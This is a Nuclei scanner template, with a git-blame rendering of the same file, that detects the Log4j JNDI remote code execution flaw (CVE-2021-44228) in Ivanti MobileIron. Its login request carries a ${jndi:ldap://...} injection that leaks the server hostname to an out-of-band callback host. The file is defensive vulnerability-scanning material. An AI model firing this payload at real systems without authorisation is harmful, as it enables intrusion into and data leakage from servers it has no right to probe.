nuclei-templates/http/vulnerabilities/mobileiron/mobileiron-log4j-jndi-rce.yaml

id: mobileiron-log4j-jndi-rce

info:
  name: Ivanti MobileIron (Log4j) - Remote Code Execution
  author: meme-lord
  severity: critical
  description: Ivanti MobileIron is susceptible to remote code execution via the Apache Log4j2 library.  Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1) JNDI features used in configuration, log messages, and parameters do not protect against attacker-controlled LDAP and other JNDI-related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled.
  remediation: From log4j 2.15.0, this behavior has been disabled by default. From version 2.16.0 (along with 2.12.2, 2.12.3, and 2.3.1), this functionality has been completely removed. Note that this vulnerability is specific to log4j-core and does not affect log4net, log4cxx, or other Apache Logging Services projects.
  reference:
    - https://github.com/advisories/GHSA-jfh8-c2jp-5v3q
    - https://www.lunasec.io/docs/blog/log4j-zero-day/
    - https://www.zdnet.com/article/mobileiron-customers-urged-to-patch-systems-due-to-potential-log4j-exploitation/
    - https://logging.apache.org/log4j/2.x/security.html
    - https://nvd.nist.gov/vuln/detail/CVE-2021-44228
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10
    cve-id: CVE-2021-44228
    cwe-id: CWE-917
    cpe: cpe:2.3:a:ivanti:mobileiron:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    shodan-query: http.html:"MobileIron"
    product: mobileiron
    vendor: ivanti
  tags: jndi,log4j,rce,cve,cve2021,ivanti,oast,mobileiron,kev
variables:
  rand1: '{{rand_int(111, 999)}}'
  rand2: '{{rand_int(111, 999)}}'

http:
  - raw:
      - |
        POST /mifs/j_spring_security_check HTTP/1.1
        Referer: {{RootURL}}/mifs/user/login.jsp
        Content-Type: application/x-www-form-urlencoded

        j_username=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}}&j_password=password&logincontext=employee

    matchers-condition: and
    matchers:
      - type: word
        part: location
        words:
          - '/mifs/user/login.jsp?error=1'

      - type: word
        part: interactsh_protocol # Confirms the DNS Interaction
        words:
          - "dns"

      - type: regex
        part: interactsh_request
        regex:
          - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'

    extractors:
      - type: kval
        kval:
          - interactsh_ip

      - type: regex
        part: interactsh_request
        group: 2
        regex:
          - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'

      - type: regex
        part: interactsh_request
        group: 1
        regex:
          - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'
# digest: 490a0046304402202ce48c562d69704bcd9b69f70e54c1e94e6146c6bf9038a3a694e2a6bbe93cdf022024c1dbee3879e0697e03a720b4084e1b06d7785643aaa4d68be531d81c356d8d:922c64590222798bb761d5b6d8e72950
Added MobileIron log4j template (#3355) * Added MobileIron log4j * misc updates Co-authored-by: meme-lord <17912559+meme-lord@users.noreply.github.com> Co-authored-by: sandeep <sandeep@projectdiscovery.io> 2021-12-16 17:07:32 +00:00			`id: mobileiron-log4j-jndi-rce`

			`info:`
Dashboard Content Enhancements (#6965) * Add description and enhance one where the UI failed to save properly. dos2unix on a template * Change cvedetails link to nvd * make severities match * Enhancement: cves/2015/CVE-2015-2863.yaml by md * Enhancement: cves/2017/CVE-2017-14524.yaml by md * Enhancement: cves/2017/CVE-2017-5638.yaml by md * Enhancement: cves/2019/CVE-2019-16759.yaml by md * Enhancement: cves/2021/CVE-2021-22986.yaml by md * Enhancement: cves/2021/CVE-2021-24145.yaml by md * Enhancement: cves/2021/CVE-2021-24145.yaml by md * Enhancement: cves/2021/CVE-2021-24155.yaml by md * Enhancement: cves/2021/CVE-2021-24145.yaml by md * Enhancement: cves/2021/CVE-2021-24145.yaml by md * Enhancement: cves/2021/CVE-2021-24347.yaml by md * Enhancement: cves/2021/CVE-2021-25003.yaml by md * Enhancement: cves/2021/CVE-2021-25296.yaml by md * Enhancement: cves/2021/CVE-2021-25297.yaml by md * Enhancement: cves/2021/CVE-2021-25296.yaml by md * Enhancement: cves/2021/CVE-2021-25297.yaml by md * Enhancement: cves/2021/CVE-2021-25298.yaml by md * Enhancement: cves/2021/CVE-2021-25297.yaml by md * Enhancement: cves/2021/CVE-2021-28151.yaml by md * Enhancement: cves/2021/CVE-2021-30128.yaml by md * Enhancement: cves/2022/CVE-2022-0824.yaml by md * Enhancement: cves/2022/CVE-2022-0824.yaml by md * Enhancement: cves/2022/CVE-2022-0885.yaml by md * Enhancement: cves/2022/CVE-2022-21587.yaml by md * Enhancement: cves/2022/CVE-2022-2314.yaml by md * Enhancement: cves/2022/CVE-2022-24816.yaml by md * Enhancement: cves/2022/CVE-2022-31499.yaml by md * Enhancement: cves/2022/CVE-2022-21587.yaml by md * Enhancement: cves/2021/CVE-2021-24155.yaml by md * Enhancement: cves/2017/CVE-2017-5638.yaml by md * Enhancement: cves/2015/CVE-2015-2863.yaml by md * Enhancement: cves/2022/CVE-2022-33901.yaml by md * Enhancement: cves/2022/CVE-2022-2314.yaml by md * Enhancement: cves/2022/CVE-2022-33901.yaml by md * Enhancement: cves/2022/CVE-2022-34753.yaml by md * Enhancement: cves/2022/CVE-2022-39952.yaml by md * Enhancement: cves/2022/CVE-2022-4060.yaml by md * Enhancement: cves/2022/CVE-2022-44877.yaml by md * Enhancement: cves/2023/CVE-2023-0669.yaml by md * Enhancement: cves/2023/CVE-2023-26255.yaml by md * Enhancement: cves/2023/CVE-2023-26256.yaml by md * Enhancement: exposures/files/salesforce-credentials.yaml by md * Enhancement: misconfiguration/hadoop-unauth-rce.yaml by md * Enhancement: misconfiguration/installer/nopcommerce-installer.yaml by md * Enhancement: network/backdoor/backdoored-zte.yaml by md * Enhancement: network/detection/ibm-d2b-database-server.yaml by md * Enhancement: network/detection/ibm-d2b-database-server.yaml by md * Enhancement: technologies/oracle/oracle-atg-commerce.yaml by md * Enhancement: token-spray/api-abuseipdb.yaml by md * Enhancement: token-spray/api-abuseipdb.yaml by md * Enhancement: token-spray/api-dbt.yaml by md * Enhancement: vulnerabilities/avaya/avaya-aura-rce.yaml by md * Enhancement: vulnerabilities/avaya/avaya-aura-xss.yaml by md * Enhancement: vulnerabilities/cisco/cisco-cloudcenter-suite-rce.yaml by md * Enhancement: vulnerabilities/froxlor-xss.yaml by md * Enhancement: vulnerabilities/jamf/jamf-log4j-jndi-rce.yaml by md * Enhancement: vulnerabilities/mobileiron/mobileiron-log4j-jndi-rce.yaml by md * Enhancement: vulnerabilities/jamf/jamf-log4j-jndi-rce.yaml by md * Enhancement: vulnerabilities/opencpu/opencpu-rce.yaml by md * Enhancement: vulnerabilities/other/academy-lms-xss.yaml by md * Enhancement: vulnerabilities/other/caucho-resin-info-disclosure.yaml by md * Enhancement: vulnerabilities/other/ckan-dom-based-xss.yaml by md * Enhancement: vulnerabilities/other/couchdb-adminparty.yaml by md * Enhancement: vulnerabilities/other/graylog-log4j.yaml by md * Enhancement: vulnerabilities/mobileiron/mobileiron-log4j-jndi-rce.yaml by md * Initial cleanups for syntax errors * dashboard gremlins * Add log4j back to name * Enhancement: exposures/files/salesforce-credentials.yaml by cs * Enhancement: misconfiguration/installer/nopcommerce-installer.yaml by cs * Enhancement: network/backdoor/backdoored-zte.yaml by cs * Enhancement: vulnerabilities/other/couchdb-adminparty.yaml by cs * Sev and other info tweaks * Merge conflict --------- Co-authored-by: sullo <sullo@cirt.net> 2023-03-27 17:46:47 +00:00			`name: Ivanti MobileIron (Log4j) - Remote Code Execution`
Added MobileIron log4j template (#3355) * Added MobileIron log4j * misc updates Co-authored-by: meme-lord <17912559+meme-lord@users.noreply.github.com> Co-authored-by: sandeep <sandeep@projectdiscovery.io> 2021-12-16 17:07:32 +00:00			`author: meme-lord`
Update mobileiron-log4j-jndi-rce.yaml 2022-07-16 17:07:18 +00:00			`severity: critical`
Dashboard Content Enhancements (#6965) * Add description and enhance one where the UI failed to save properly. dos2unix on a template * Change cvedetails link to nvd * make severities match * Enhancement: cves/2015/CVE-2015-2863.yaml by md * Enhancement: cves/2017/CVE-2017-14524.yaml by md * Enhancement: cves/2017/CVE-2017-5638.yaml by md * Enhancement: cves/2019/CVE-2019-16759.yaml by md * Enhancement: cves/2021/CVE-2021-22986.yaml by md * Enhancement: cves/2021/CVE-2021-24145.yaml by md * Enhancement: cves/2021/CVE-2021-24145.yaml by md * Enhancement: cves/2021/CVE-2021-24155.yaml by md * Enhancement: cves/2021/CVE-2021-24145.yaml by md * Enhancement: cves/2021/CVE-2021-24145.yaml by md * Enhancement: cves/2021/CVE-2021-24347.yaml by md * Enhancement: cves/2021/CVE-2021-25003.yaml by md * Enhancement: cves/2021/CVE-2021-25296.yaml by md * Enhancement: cves/2021/CVE-2021-25297.yaml by md * Enhancement: cves/2021/CVE-2021-25296.yaml by md * Enhancement: cves/2021/CVE-2021-25297.yaml by md * Enhancement: cves/2021/CVE-2021-25298.yaml by md * Enhancement: cves/2021/CVE-2021-25297.yaml by md * Enhancement: cves/2021/CVE-2021-28151.yaml by md * Enhancement: cves/2021/CVE-2021-30128.yaml by md * Enhancement: cves/2022/CVE-2022-0824.yaml by md * Enhancement: cves/2022/CVE-2022-0824.yaml by md * Enhancement: cves/2022/CVE-2022-0885.yaml by md * Enhancement: cves/2022/CVE-2022-21587.yaml by md * Enhancement: cves/2022/CVE-2022-2314.yaml by md * Enhancement: cves/2022/CVE-2022-24816.yaml by md * Enhancement: cves/2022/CVE-2022-31499.yaml by md * Enhancement: cves/2022/CVE-2022-21587.yaml by md * Enhancement: cves/2021/CVE-2021-24155.yaml by md * Enhancement: cves/2017/CVE-2017-5638.yaml by md * Enhancement: cves/2015/CVE-2015-2863.yaml by md * Enhancement: cves/2022/CVE-2022-33901.yaml by md * Enhancement: cves/2022/CVE-2022-2314.yaml by md * Enhancement: cves/2022/CVE-2022-33901.yaml by md * Enhancement: cves/2022/CVE-2022-34753.yaml by md * Enhancement: cves/2022/CVE-2022-39952.yaml by md * Enhancement: cves/2022/CVE-2022-4060.yaml by md * Enhancement: cves/2022/CVE-2022-44877.yaml by md * Enhancement: cves/2023/CVE-2023-0669.yaml by md * Enhancement: cves/2023/CVE-2023-26255.yaml by md * Enhancement: cves/2023/CVE-2023-26256.yaml by md * Enhancement: exposures/files/salesforce-credentials.yaml by md * Enhancement: misconfiguration/hadoop-unauth-rce.yaml by md * Enhancement: misconfiguration/installer/nopcommerce-installer.yaml by md * Enhancement: network/backdoor/backdoored-zte.yaml by md * Enhancement: network/detection/ibm-d2b-database-server.yaml by md * Enhancement: network/detection/ibm-d2b-database-server.yaml by md * Enhancement: technologies/oracle/oracle-atg-commerce.yaml by md * Enhancement: token-spray/api-abuseipdb.yaml by md * Enhancement: token-spray/api-abuseipdb.yaml by md * Enhancement: token-spray/api-dbt.yaml by md * Enhancement: vulnerabilities/avaya/avaya-aura-rce.yaml by md * Enhancement: vulnerabilities/avaya/avaya-aura-xss.yaml by md * Enhancement: vulnerabilities/cisco/cisco-cloudcenter-suite-rce.yaml by md * Enhancement: vulnerabilities/froxlor-xss.yaml by md * Enhancement: vulnerabilities/jamf/jamf-log4j-jndi-rce.yaml by md * Enhancement: vulnerabilities/mobileiron/mobileiron-log4j-jndi-rce.yaml by md * Enhancement: vulnerabilities/jamf/jamf-log4j-jndi-rce.yaml by md * Enhancement: vulnerabilities/opencpu/opencpu-rce.yaml by md * Enhancement: vulnerabilities/other/academy-lms-xss.yaml by md * Enhancement: vulnerabilities/other/caucho-resin-info-disclosure.yaml by md * Enhancement: vulnerabilities/other/ckan-dom-based-xss.yaml by md * Enhancement: vulnerabilities/other/couchdb-adminparty.yaml by md * Enhancement: vulnerabilities/other/graylog-log4j.yaml by md * Enhancement: vulnerabilities/mobileiron/mobileiron-log4j-jndi-rce.yaml by md * Initial cleanups for syntax errors * dashboard gremlins * Add log4j back to name * Enhancement: exposures/files/salesforce-credentials.yaml by cs * Enhancement: misconfiguration/installer/nopcommerce-installer.yaml by cs * Enhancement: network/backdoor/backdoored-zte.yaml by cs * Enhancement: vulnerabilities/other/couchdb-adminparty.yaml by cs * Sev and other info tweaks * Merge conflict --------- Co-authored-by: sullo <sullo@cirt.net> 2023-03-27 17:46:47 +00:00			description: Ivanti MobileIron is susceptible to remote code execution via the Apache Log4j2 library. Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1) JNDI features used in configuration, log messages, and parameters do not protect against attacker-controlled LDAP and other JNDI-related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled.
templateman update 2023-10-14 11:27:55 +00:00			`remediation: From log4j 2.15.0, this behavior has been disabled by default. From version 2.16.0 (along with 2.12.2, 2.12.3, and 2.3.1), this functionality has been completely removed. Note that this vulnerability is specific to log4j-core and does not affect log4net, log4cxx, or other Apache Logging Services projects.`
Added MobileIron log4j template (#3355) * Added MobileIron log4j * misc updates Co-authored-by: meme-lord <17912559+meme-lord@users.noreply.github.com> Co-authored-by: sandeep <sandeep@projectdiscovery.io> 2021-12-16 17:07:32 +00:00			`reference:`
			`- https://github.com/advisories/GHSA-jfh8-c2jp-5v3q`
			`- https://www.lunasec.io/docs/blog/log4j-zero-day/`
Enhancement: vulnerabilities/mobileiron/mobileiron-log4j-jndi-rce.yaml by cs 2022-02-28 19:44:36 +00:00			`- https://www.zdnet.com/article/mobileiron-customers-urged-to-patch-systems-due-to-potential-log4j-exploitation/`
Update mobileiron-log4j-jndi-rce.yaml 2022-07-16 17:07:18 +00:00			`- https://logging.apache.org/log4j/2.x/security.html`
			`- https://nvd.nist.gov/vuln/detail/CVE-2021-44228`
Enhancement: vulnerabilities/mobileiron/mobileiron-log4j-jndi-rce.yaml by cs 2022-02-28 19:44:36 +00:00			`classification:`
Auto Generated CVE annotations [Sat Aug 27 04:41:18 UTC 2022] :robot: 2022-08-27 04:41:18 +00:00			`cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H`
			`cvss-score: 10`
Enhancement: vulnerabilities/mobileiron/mobileiron-log4j-jndi-rce.yaml by cs 2022-02-28 19:44:36 +00:00			`cve-id: CVE-2021-44228`
Auto Generated CVE annotations [Sat Aug 27 04:41:18 UTC 2022] :robot: 2022-08-27 04:41:18 +00:00			`cwe-id: CWE-917`
Add missing cpes Added missing cpes 2024-09-10 08:22:50 +00:00			`cpe: cpe:2.3:a:ivanti:mobileiron::::::::`
Update mobileiron-log4j-jndi-rce.yaml 2022-07-18 06:34:37 +00:00			`metadata:`
templateman update 2023-10-14 11:27:55 +00:00			`verified: true`
Added max request counter of each template 2023-04-28 08:11:21 +00:00			`max-request: 1`
Update mobileiron-log4j-jndi-rce.yaml 2022-07-18 06:34:37 +00:00			`shodan-query: http.html:"MobileIron"`
Add missing cpes Added missing cpes 2024-09-10 08:22:50 +00:00			`product: mobileiron`
			`vendor: ivanti`
Auto Generated CVE annotations [Sat Aug 27 04:41:18 UTC 2022] :robot: 2022-08-27 04:41:18 +00:00			`tags: jndi,log4j,rce,cve,cve2021,ivanti,oast,mobileiron,kev`
updated log4j 2023-05-03 17:51:44 +00:00			`variables:`
			`rand1: '{{rand_int(111, 999)}}'`
			`rand2: '{{rand_int(111, 999)}}'`

Refactoring the directory structure based on protocols (#7137) * moving http templates * updated cves.json * moved network CVEs * updated scripts * updated workflows * updated requests to http * replaced network to tcp --------- Co-authored-by: sandeep <8293321+ehsandeep@users.noreply.github.com> 2023-04-27 04:28:59 +00:00			`http:`
Added MobileIron log4j template (#3355) * Added MobileIron log4j * misc updates Co-authored-by: meme-lord <17912559+meme-lord@users.noreply.github.com> Co-authored-by: sandeep <sandeep@projectdiscovery.io> 2021-12-16 17:07:32 +00:00			`- raw:`
			`- \|`
			`POST /mifs/j_spring_security_check HTTP/1.1`
			`Referer: {{RootURL}}/mifs/user/login.jsp`
			`Content-Type: application/x-www-form-urlencoded`

payload update 2023-05-08 05:37:00 +00:00			`j_username=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}}&j_password=password&logincontext=employee`
Added MobileIron log4j template (#3355) * Added MobileIron log4j * misc updates Co-authored-by: meme-lord <17912559+meme-lord@users.noreply.github.com> Co-authored-by: sandeep <sandeep@projectdiscovery.io> 2021-12-16 17:07:32 +00:00
			`matchers-condition: and`
			`matchers:`
			`- type: word`
update 2023-11-17 08:49:19 +00:00			`part: location`
Added MobileIron log4j template (#3355) * Added MobileIron log4j * misc updates Co-authored-by: meme-lord <17912559+meme-lord@users.noreply.github.com> Co-authored-by: sandeep <sandeep@projectdiscovery.io> 2021-12-16 17:07:32 +00:00			`words:`
update 2023-11-17 08:49:19 +00:00			`- '/mifs/user/login.jsp?error=1'`
Added MobileIron log4j template (#3355) * Added MobileIron log4j * misc updates Co-authored-by: meme-lord <17912559+meme-lord@users.noreply.github.com> Co-authored-by: sandeep <sandeep@projectdiscovery.io> 2021-12-16 17:07:32 +00:00
Update mobileiron-log4j-jndi-rce.yaml 2022-10-19 21:08:01 +00:00			`- type: word`
update 2023-11-17 08:49:19 +00:00			`part: interactsh_protocol # Confirms the DNS Interaction`
Update mobileiron-log4j-jndi-rce.yaml 2022-10-19 21:08:01 +00:00			`words:`
update 2023-11-17 08:49:19 +00:00			`- "dns"`
Update mobileiron-log4j-jndi-rce.yaml 2022-10-19 21:08:01 +00:00
Added MobileIron log4j template (#3355) * Added MobileIron log4j * misc updates Co-authored-by: meme-lord <17912559+meme-lord@users.noreply.github.com> Co-authored-by: sandeep <sandeep@projectdiscovery.io> 2021-12-16 17:07:32 +00:00			`- type: regex`
			`part: interactsh_request`
			`regex:`
update 2023-11-17 08:49:19 +00:00			`- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'`
Added MobileIron log4j template (#3355) * Added MobileIron log4j * misc updates Co-authored-by: meme-lord <17912559+meme-lord@users.noreply.github.com> Co-authored-by: sandeep <sandeep@projectdiscovery.io> 2021-12-16 17:07:32 +00:00
			`extractors:`
updated log4j 2023-05-03 17:51:44 +00:00			`- type: kval`
			`kval:`
update 2023-11-17 08:49:19 +00:00			`- interactsh_ip`
updated log4j 2023-05-03 17:51:44 +00:00
			`- type: regex`
update 2023-11-17 08:49:19 +00:00			`part: interactsh_request`
updated log4j 2023-05-03 17:51:44 +00:00			`group: 2`
			`regex:`
update 2023-11-17 08:49:19 +00:00			`- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'`
updated log4j 2023-05-03 17:51:44 +00:00
Added MobileIron log4j template (#3355) * Added MobileIron log4j * misc updates Co-authored-by: meme-lord <17912559+meme-lord@users.noreply.github.com> Co-authored-by: sandeep <sandeep@projectdiscovery.io> 2021-12-16 17:07:32 +00:00			`- type: regex`
update 2023-11-17 08:49:19 +00:00			`part: interactsh_request`
Added MobileIron log4j template (#3355) * Added MobileIron log4j * misc updates Co-authored-by: meme-lord <17912559+meme-lord@users.noreply.github.com> Co-authored-by: sandeep <sandeep@projectdiscovery.io> 2021-12-16 17:07:32 +00:00			`group: 1`
			`regex:`
update 2023-11-17 08:49:19 +00:00			`- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'`
chore: sign templates 🤖 2024-09-12 05:14:01 +00:00			`# digest: 490a0046304402202ce48c562d69704bcd9b69f70e54c1e94e6146c6bf9038a3a694e2a6bbe93cdf022024c1dbee3879e0697e03a720b4084e1b06d7785643aaa4d68be531d81c356d8d:922c64590222798bb761d5b6d8e72950`